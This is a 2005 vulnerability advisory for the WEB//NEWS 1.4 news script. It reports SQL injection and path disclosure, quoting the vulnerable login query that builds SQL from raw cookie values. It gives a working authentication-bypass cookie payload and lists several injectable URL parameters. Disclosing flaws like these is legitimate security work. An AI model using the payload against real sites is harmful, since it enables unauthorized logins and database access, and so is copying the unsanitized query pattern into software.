[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4 Vulnerabilities

[r.verton () gmail com]

[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4
=============================================================================

Software: WEB//NEWS 1.4
Type: SQL Injections, Path Disclosure
Risk: High

Date: Sep. 1 2005
Vendor: Stylemotion


Credit:
=======
Robin 'onkel_fisch' Verton
http://www.it-security23.net

Description:
============
WEB//News is a Newsscript which features like an CMS


Vulnerability:
==============

In the modules/startup.php

$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid) 
                      WHERE 
                        ( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' ) 
                      LIMIT 1");

As we can see, the $_COOKIE paramter is not checked. Below i've added how you have to set the Cookies
to take advantage of these vulnerability (send this to index.php):

wn_userid=1; wn_userpw=0' OR '1'='1

Path Disclosure:
No file in he /actions dir is testet if it is directly included.
Example:
/actions/cat.add.php?name=A

Nearly every REQUEST variable is not checked so there are a few of SQL-Injections availiable

A few Examples:
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/print.php?id=[SQL]
/include_this/news.php?stof=[SQL]

Greets:
==============
Whole NewAngel Team, CyberDead, Modhacker, deluxe